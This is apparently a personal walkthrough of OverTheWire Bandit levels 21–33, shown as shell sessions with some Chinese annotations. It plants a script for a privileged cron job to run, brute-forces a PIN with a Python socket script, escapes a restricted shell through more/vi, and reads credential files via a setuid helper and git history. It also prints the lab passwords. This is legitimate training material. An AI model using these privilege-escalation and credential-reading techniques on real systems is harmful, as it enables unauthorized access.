-rw-r--r--   1 root root   122 Sep 19 07:08 cronjob_bandit23
-rw-r--r--   1 root root   120 Sep 19 07:08 cronjob_bandit24
-rw-r--r--   1 root root   201 Apr  8  2024 e2scrub_all
-rwx------   1 root root    52 Sep 19 07:10 otw-tmp-dir
-rw-r--r--   1 root root   102 Mar 31  2024 .placeholder
-rw-r--r--   1 root root   396 Jan  9  2024 sysstat
bandit21@bandit:/etc/cron.d$ cat cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
bandit21@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
bandit21@bandit:/etc/cron.d$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
tRae0UfB9v0UzbCdn9cY0gQnds9GF58Q

Level 22

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.
bandit22@bandit:/etc/cron.d$ cat cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null
bandit22@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget
bandit22@bandit:/etc/cron.d$ myname=bandit23
bandit22@bandit:/etc/cron.d$ mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)
bandit22@bandit:/etc/cron.d$ echo $mytarget
8ca319486bfbbc3663ea0fbe81326349
bandit22@bandit:/etc/cron.d$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
0Zf11ioIjMVN551jX3CmStKLYqjk54Ga

Level 23

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
bandit23@bandit:/etc/cron.d$ cat cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname/foo
echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done

这个脚本会遍历/var/spool/$myname/foo 目录下的所有文件,检查它们的拥有者。如果文件的拥有者是bandit23,它会执行该文件(最多 60 秒),然后无论是否执行成功都会删除该文件。
可以写以bandit23用户写一个指令,输出bandit24的密码

bandit23@bandit:/tmp/ta0$ cat fuck.sh
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/ta0/fuck.txt
bandit23@bandit:/tmp/ta0$ ls -al
total 1232
drwxrwxrwx     2 bandit23 bandit23    4096 Oct 22 11:27 .
drwxrwx-wt 24472 root     root     1245184 Oct 22 11:36 ..
-rwxrwxrwx     1 bandit23 bandit23      62 Oct 22 11:25 fuck.sh
-rwxrwxrwx     1 bandit23 bandit23       0 Oct 22 11:36 fuck.txt
bandit23@bandit:/tmp/ta0$ cp fuck.sh /var/spool/bandit24/foo/aa.sh
bandit23@bandit:/tmp/ta0$ ls -al
total 1232
drwxrwxrwx     2 bandit23 bandit23    4096 Oct 22 11:27 .
drwxrwx-wt 24472 root     root     1245184 Oct 22 11:36 ..
-rwxrwxrwx     1 bandit23 bandit23      62 Oct 22 11:25 fuck.sh
-rwxrwxrwx     1 bandit23 bandit23      33 Oct 22 11:36 fuck.txt
bandit23@bandit:/tmp/ta0$ cat fuck.txt
gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8

Level 24

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
You do not need to create new connections each time
bandit24@bandit:/tmp/ttmp$ cat a.py
#!/usr/bin/env python3
# coding: utf-8
import sys
import socket

pincode = 0
password = "gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8"

try:
    # Connect to server
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("127.0.0.1", 30002))

    # Print welcome message
    welcome_msg = s.recv(2048).decode()  # 解码消息
    print(welcome_msg)

    # Try brute-forcing
    while pincode < 10000:
        pincode_string = str(pincode).zfill(4)
        message = password + " " + pincode_string + "\n"
        
        # Send message
        s.sendall(message.encode())
        
        # Receive response
        receive_msg = s.recv(1024).decode()  # 接收到的消息也要解码
        
        # Check result
        if "Wrong" in receive_msg:
            print("Wrong PINCODE: %s" % pincode_string)
        else:
            print("Correct PINCODE: %s" % pincode_string)
            print("Response: %s" % receive_msg)
            break
        pincode += 1
finally:
    # Close the socket connection
    s.close()
    sys.exit(1)
Correct PINCODE: 9297
Response: Correct!
The password of user bandit25 is iCi86ttT4KSNe1armKiwbQNmB3YJP3q4

Level 25

Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.

NOTE: if you’re a Windows user and typically use Powershell to ssh into bandit: Powershell is known to cause issues with the intended solution to this level. You should use command prompt instead.
bandit25@bandit:~$ ssh -i bandit26.sshkey bandit26@localhost -p 2220

秒退

bandit25@bandit:~$ cat /etc/passwd |grep 26
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
bandit25@bandit:~$ showtext
more: cannot open /home/bandit25/text.txt: No such file or directory
bandit25@bandit:~$ whereis showtext
showtext: /usr/bin/showtext
bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh

export TERM=linux

exec more ~/text.txt
exit 0

执行了more指令,很容易想到more提权,利用终端窗口很小显示不全
ODd7ND.png
按V进入shell

:set shell=/bin/bash
:shell
bandit26@bandit:~$ id
uid=11026(bandit26) gid=11026(bandit26) groups=11026(bandit26)

Level 26

Good job getting a shell! Now hurry and grab the password for bandit27!
bandit26@bandit:~$ ls -al
total 44
drwxr-xr-x  3 root     root      4096 Sep 19 07:08 .
drwxr-xr-x 70 root     root      4096 Sep 19 07:09 ..
-rwsr-x---  1 bandit27 bandit26 14880 Sep 19 07:08 bandit27-do
-rw-r--r--  1 root     root       220 Mar 31  2024 .bash_logout
-rw-r--r--  1 root     root      3771 Mar 31  2024 .bashrc
-rw-r--r--  1 root     root       807 Mar 31  2024 .profile
drwxr-xr-x  2 root     root      4096 Sep 19 07:08 .ssh
-rw-r-----  1 bandit26 bandit26   258 Sep 19 07:08 text.txt
bandit26@bandit:~$ ./bandit27-do 
Run a command as another user.
  Example: ./bandit27-do id
bandit26@bandit:~$ ./bandit27-do cat /etc/bandit_pass/bandit27
upsNCc7vzaRDx6oZC6GiR6ERwe1MowGB

Level 27

There is a git repository at ssh://bandit27-git@localhost/home/bandit27-git/repo via the port 2220. The password for the user bandit27-git is the same as for the user bandit27.

Clone the repository and find the password for the next level.
bandit27@bandit:/tmp/tmp.LUDsrNLx3S$ git clone ssh://bandit27-git@localhost:2220/home/bandit27-git/repo
Cloning into 'repo'...
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can't be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/home/bandit27/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/home/bandit27/.ssh/known_hosts).
                         _                     _ _ _   
                        | |__   __ _ _ __   __| (_) |_ 
                        | '_ \ / _` | '_ \ / _` | | __|
                        | |_) | (_| | | | | (_| | | |_ 
                        |_.__/ \__,_|_| |_|\__,_|_|\__|
                                                       

                      This is an OverTheWire game server. 
            More information on http://www.overthewire.org/wargames

bandit27-git@localhost's password: 
remote: Enumerating objects: 3, done.
remote: Counting objects: 100% (3/3), done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 3 (delta 0), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (3/3), done.
bandit27@bandit:/tmp/tmp.LUDsrNLx3S$ ls
repo
bandit27@bandit:/tmp/tmp.LUDsrNLx3S$ cd repo/
bandit27@bandit:/tmp/tmp.LUDsrNLx3S/repo$ ls
README
bandit27@bandit:/tmp/tmp.LUDsrNLx3S/repo$ cat README 
The password to the next level is: Yz9IpL0sBcCeuG7m9uQFt8ZNpS4HZRcN

Level 28

There is a git repository at ssh://bandit28-git@localhost/home/bandit28-git/repo via the port 2220. The password for the user bandit28-git is the same as for the user bandit28.

Clone the repository and find the password for the next level.
bandit28@bandit:/tmp/tmp.nlCeByqiBU$ git clone ssh://bandit28-git@localhost:2220/home/bandit28-git/repo
Cloning into 'repo'...
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can't be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/home/bandit28/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/home/bandit28/.ssh/known_hosts).
                         _                     _ _ _   
                        | |__   __ _ _ __   __| (_) |_ 
                        | '_ \ / _` | '_ \ / _` | | __|
                        | |_) | (_| | | | | (_| | | |_ 
                        |_.__/ \__,_|_| |_|\__,_|_|\__|
                                                       

                      This is an OverTheWire game server. 
            More information on http://www.overthewire.org/wargames

bandit28-git@localhost's password: 
remote: Enumerating objects: 9, done.
remote: Counting objects: 100% (9/9), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 9 (delta 2), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (9/9), done.
Resolving deltas: 100% (2/2), done.
bandit28@bandit:/tmp/tmp.nlCeByqiBU$ ls -al
total 1232
drwx------     3 bandit28 bandit28    4096 Oct 22 13:42 .
drwxrwx-wt 24589 root     root     1249280 Oct 22 13:42 ..
drwxrwxr-x     3 bandit28 bandit28    4096 Oct 22 13:42 repo
bandit28@bandit:/tmp/tmp.nlCeByqiBU$ cd repo/
bandit28@bandit:/tmp/tmp.nlCeByqiBU/repo$ ls  -al
total 16
drwxrwxr-x 3 bandit28 bandit28 4096 Oct 22 13:42 .
drwx------ 3 bandit28 bandit28 4096 Oct 22 13:42 ..
drwxrwxr-x 8 bandit28 bandit28 4096 Oct 22 13:42 .git
-rw-rw-r-- 1 bandit28 bandit28  111 Oct 22 13:42 README.md
bandit28@bandit:/tmp/tmp.nlCeByqiBU/repo$ cat README.md 
# Bandit Notes
Some notes for level29 of bandit.

## credentials

- username: bandit29
- password: xxxxxxxxxx
bandit28@bandit:/tmp/tmp.nlCeByqiBU/repo/.git$ git log
commit 817e303aa6c2b207ea043c7bba1bb7575dc4ea73 (HEAD -> master, origin/master, origin/HEAD)
Author: Morla Porla <morla@overthewire.org>
Date:   Thu Sep 19 07:08:39 2024 +0000

    fix info leak

commit 3621de89d8eac9d3b64302bfb2dc67e9a566decd
Author: Morla Porla <morla@overthewire.org>
Date:   Thu Sep 19 07:08:39 2024 +0000

    add missing data

commit 0622b73250502618babac3d174724bb303c32182
Author: Ben Dover <noone@overthewire.org>
Date:   Thu Sep 19 07:08:39 2024 +0000

    initial commit of README.md
bandit28@bandit:/tmp/tmp.nlCeByqiBU/repo/.git$ git show 817e303aa6c2b207ea043c7bba1bb7575dc4ea73
commit 817e303aa6c2b207ea043c7bba1bb7575dc4ea73 (HEAD -> master, origin/master, origin/HEAD)
Author: Morla Porla <morla@overthewire.org>
Date:   Thu Sep 19 07:08:39 2024 +0000

    fix info leak

diff --git a/README.md b/README.md
index d4e3b74..5c6457b 100644
--- a/README.md
+++ b/README.md
@@ -4,5 +4,5 @@ Some notes for level29 of bandit.
 ## credentials
 
 - username: bandit29
-- password: 4pT1t5DENaYuqnqvadYs1oE4QLCdjmJ7
+- password: xxxxxxxxxx

Level 29

There is a git repository at ssh://bandit29-git@localhost/home/bandit29-git/repo via the port 2220. The password for the user bandit29-git is the same as for the user bandit29.

Clone the repository and find the password for the next level.
bandit29@bandit:/tmp/tmp.9UIF3nOd51$ git clone ssh://bandit29-git@localhost:2220/home/bandit29-git/repo
bandit29@bandit:/tmp/tmp.9UIF3nOd51/repo$ ls  -al
total 16
drwxrwxr-x 3 bandit29 bandit29 4096 Oct 22 13:49 .
drwx------ 3 bandit29 bandit29 4096 Oct 22 13:49 ..
drwxrwxr-x 8 bandit29 bandit29 4096 Oct 22 13:49 .git
-rw-rw-r-- 1 bandit29 bandit29  131 Oct 22 13:49 README.md
bandit29@bandit:/tmp/tmp.9UIF3nOd51/repo$ cat  README.md 
# Bandit Notes
Some notes for bandit30 of bandit.

## credentials

- username: bandit30
- password: <no passwords in production!>

bandit29@bandit:/tmp/tmp.9UIF3nOd51/repo$ git branch -a
* master
  remotes/origin/HEAD -> origin/master
  remotes/origin/dev
  remotes/origin/master
  remotes/origin/sploits-dev
bandit29@bandit:/tmp/tmp.9UIF3nOd51/repo$ git checkout dev
branch 'dev' set up to track 'origin/dev'.
Switched to a new branch 'dev'

bandit29@bandit:/tmp/tmp.9UIF3nOd51/repo$ cat README.md 
# Bandit Notes
Some notes for bandit30 of bandit.

## credentials

- username: bandit30
- password: qp30ex3VLz5MDG1n91YowTv4Q8l7CDZL

Level 30

There is a git repository at ssh://bandit30-git@localhost/home/bandit30-git/repo via the port 2220. The password for the user bandit30-git is the same as for the user bandit30.

Clone the repository and find the password for the next level.
bandit30@bandit:/tmp/tmp.lWSlL6U8GR/repo$ ls -al
total 16
drwxrwxr-x 3 bandit30 bandit30 4096 Oct 22 13:57 .
drwx------ 3 bandit30 bandit30 4096 Oct 22 13:57 ..
drwxrwxr-x 8 bandit30 bandit30 4096 Oct 22 13:57 .git
-rw-rw-r-- 1 bandit30 bandit30   30 Oct 22 13:57 README.md
bandit30@bandit:/tmp/tmp.lWSlL6U8GR/repo$ cat README.md 
just an epmty file... muahaha
bandit30@bandit:/tmp/tmp.lWSlL6U8GR/repo$ git  tag
secret
bandit30@bandit:/tmp/tmp.lWSlL6U8GR/repo$ git show secret
fb5S2xb7bRyFmAvQYQGEqsbhVyJqhnDy

Level 31

There is a git repository at ssh://bandit31-git@localhost/home/bandit31-git/repo via the port 2220. The password for the user bandit31-git is the same as for the user bandit31.

Clone the repository and find the password for the next level.
bandit31@bandit:/tmp/tmp.Nu5Q1GG5OZ/repo$ ls -al
total 20
drwxrwxr-x 3 bandit31 bandit31 4096 Oct 22 14:00 .
drwx------ 3 bandit31 bandit31 4096 Oct 22 14:00 ..
drwxrwxr-x 8 bandit31 bandit31 4096 Oct 22 14:00 .git
-rw-rw-r-- 1 bandit31 bandit31    6 Oct 22 14:00 .gitignore
-rw-rw-r-- 1 bandit31 bandit31  147 Oct 22 14:00 README.md
bandit31@bandit:/tmp/tmp.Nu5Q1GG5OZ/repo$ cat README.md 
This time your task is to push a file to the remote repository.

Details:
    File name: key.txt
    Content: 'May I come in?'
    Branch: master
bandit31@bandit:/tmp/tmp.Nu5Q1GG5OZ/repo$ echo 'May I come in?' > key.txt
bandit31@bandit:/tmp/tmp.Nu5Q1GG5OZ/repo$ cat .gitignore 
*.txt
bandit31@bandit:/tmp/tmp.Nu5Q1GG5OZ/repo$ git add -f key.txt

bandit31@bandit:/tmp/tmp.Nu5Q1GG5OZ/repo$ git commit -a
Unable to create directory /home/bandit31/.local/share/nano/: No such file or directory
It is required for saving/loading search history or cursor positions.

[master 567f0a2] aaaaaaaaa
 1 file changed, 1 insertion(+)
 create mode 100644 key.txt
bandit31@bandit:/tmp/tmp.Nu5Q1GG5OZ/repo$ git push -u origin master
kex_exchange_identification: read: Connection reset by peer
Connection reset by 127.0.0.1 port 2220
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.

bandit31@bandit:/tmp/tmp.Nu5Q1GG5OZ/repo$ git push -u origin master
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can't be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/home/bandit31/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/home/bandit31/.ssh/known_hosts).
                         _                     _ _ _   
                        | |__   __ _ _ __   __| (_) |_ 
                        | '_ \ / _` | '_ \ / _` | | __|
                        | |_) | (_| | | | | (_| | | |_ 
                        |_.__/ \__,_|_| |_|\__,_|_|\__|
                                                       

                      This is an OverTheWire game server. 
            More information on http://www.overthewire.org/wargames

bandit31-git@localhost's password: 
Enumerating objects: 4, done.
Counting objects: 100% (4/4), done.
Delta compression using up to 2 threads
Compressing objects: 100% (2/2), done.
Writing objects: 100% (3/3), 316 bytes | 158.00 KiB/s, done.
Total 3 (delta 0), reused 0 (delta 0), pack-reused 0
remote: ### Attempting to validate files... ####
remote: 
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote: 
remote: Well done! Here is the password for the next level:
remote: 3O9RfhqyAlVBEZpVb6LYStshZoqoSx5K 
remote: 
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote: 
To ssh://localhost:2220/home/bandit31-git/repo
 ! [remote rejected] master -> master (pre-receive hook declined)
error: failed to push some refs to 'ssh://localhost:2220/home/bandit31-git/repo'

Level 32

After all this git stuff, it’s time for another escape. Good luck!
WELCOME TO THE UPPERCASE SHELL
>> $0
$ ls
$ cat /etc/bandit_pass/bandit33
tQdtbs5D5i2vJwkO8mEyYEyTL8izoeJ0

Level 33

At this moment, level 34 does not exist yet.
bandit33@bandit:~$ cat README.txt 
Congratulations on solving the last level of this game!

At this moment, there are no more levels to play in this game. However, we are constantly working
on new levels and will most likely expand this game with more levels soon.
Keep an eye out for an announcement on our usual communication channels!
In the meantime, you could play some of our other wargames.

If you have an idea for an awesome new level, please let us know!